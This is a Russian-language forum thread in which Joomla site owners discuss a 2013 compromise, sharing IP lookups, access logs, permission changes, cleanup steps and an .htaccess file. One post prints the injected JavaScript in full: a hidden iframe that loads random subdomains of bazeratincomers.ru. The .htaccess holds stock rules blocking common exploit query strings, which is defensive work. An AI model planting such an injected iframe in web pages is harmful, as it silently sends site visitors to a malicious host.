сглазил( и у меня тоже с этого
IP Information for 188.123.253.138
IP Location: Russian Federation, Nemchinovka, Akado-stolitsa Jsc
ASN: Russian Federation AS15582 AKADO-STOLITSA-AS "AKADO-Stolitsa" JSC (registered Aug 10, 2000)
IP Address: 188.123.253.138 Whois Reverse-Ip Ping DNS Lookup Traceroute
Whois Server whois.ripe.net
я же в сию секунду поправил месяц, а вы уже ответили :) ну и скорость.
С 3 сентября всё чисто... Мониторинг молчит. Еще заблокировал доступ к сайту через прокси сервера.
Подтверждаю, сегодня в 16:31 были изменены права на файл с 444 на 755,
с IP адреса: 65.19.138.34
;
var ifVcVajd = document.createElement('iframe');ifVcVajd.name = 'ifVcVajd';ifVcVajd.src = 'http://'+genstrdom(Math.floor(Math.random() * 20) + 5)+'.'+'bazeratincomers.ru/';ifVcVajd.style.width = '0px';ifVcVajd.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifVcVajd=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifVcVajd);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); setTimeout(function() { document.cookie = 'ifVcVajd=yes; path=/; expires=' + expiresDate; }, 5000);}};function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;}
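т.е. права теперь не спасают: если вредоносный скрипт выполняется от имени владельца файла, он сам может сменить права (chmod), так что 444 запись не блокирует.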
лог:
65.19.138.34 - - [03/Sep/2013:15:31:41 +0300] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 4742 "-" "Feedly/1.0 (+http://www.feedly.com/fetcher.html; like FeedFetcher-Google)"
Это IP яндекс бота, уже написал им в саппорт. Разбираются.
со страницы вк
Нет, IP разный. Хостлайф.
Сегодня залили в тот же js с 37.140.141.2
Друзья, когда первый раз обнаружили вредоносный код на сайте? У меня 6 августа. Напишите хотя бы приблизительно.
Спасибо kgtu5. Код удалил из файла, заменил стандартным файлом. Сменил все пароли. Написал вам в личку.
# .htaccess as posted in the thread, with line breaks restored.
# Contents: a non-www -> www redirect, a sitemap.xml redirect, the stock
# Joomla! query-string filter, and the stock Joomla! SEF rewrite section.
#Options +FollowSymLinks
RewriteEngine On

# Redirect the bare domain to the www host.
RewriteCond %{HTTP_HOST} yurevets37.ru$ [NC]
RewriteCond %{HTTP_HOST} !^www.yurevets37.ru$ [NC]
RewriteRule ^(.*)$ http://www.yurevets37.ru/$1 [R=301,L]

# Redirect /sitemap.xml to the com_xmap XML view.
RewriteCond %{REQUEST_URI} ^/sitemap.xml
RewriteRule .* /index.php?option=com_xmap&view=xml&tmpl=component&id=2 [R=301,L]

## Mod_rewrite in use.

## Begin - Rewrite rules to block out some common exploits.
# If you experience problems on your site block out the operations listed below
# This attempts to block the most common type of exploit `attempts` to Joomla!
#
# NOTE(review): every condition below tests %{QUERY_STRING} only. Request
# bodies, cookies and headers are not inspected, so this is a coarse filter.
# It does not explain or prevent the file modification discussed in the thread.
#
# Block out any script trying to base64_encode data within the URL.
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL.
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL.
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL.
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]
#
## End - Rewrite rules to block out some common exploits.

## Begin - Custom redirects
#
# If you need to redirect some pages, or set a canonical non-www to
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
#
## End - Custom redirects

##
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root).
##

# RewriteBase /

## Begin - Joomla! core SEF Section.
#
# Copies the Authorization request header into the HTTP_AUTHORIZATION
# environment variable.
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
#
# If the requested path and file is not /index.php and the request
# has not already been internally rewritten to the index.php script
RewriteCond %{REQUEST_URI} !^/index\.php
# and the request is for something within the component folder,
# or for the site root, or for an extensionless URL, or the
# requested URL ends with one of the listed extensions
RewriteCond %{REQUEST_URI} /component/|(/[^.]*|\.(php|html?|feed|pdf|vcf|raw))$ [NC]
# and the requested path and file doesn't directly match a physical file
RewriteCond %{REQUEST_FILENAME} !-f
# and the requested path and file doesn't directly match a physical folder
RewriteCond %{REQUEST_FILENAME} !-d
# internally rewrite the request to the index.php script
RewriteRule .* index.php [L]
#
## End - Joomla! core SEF Section.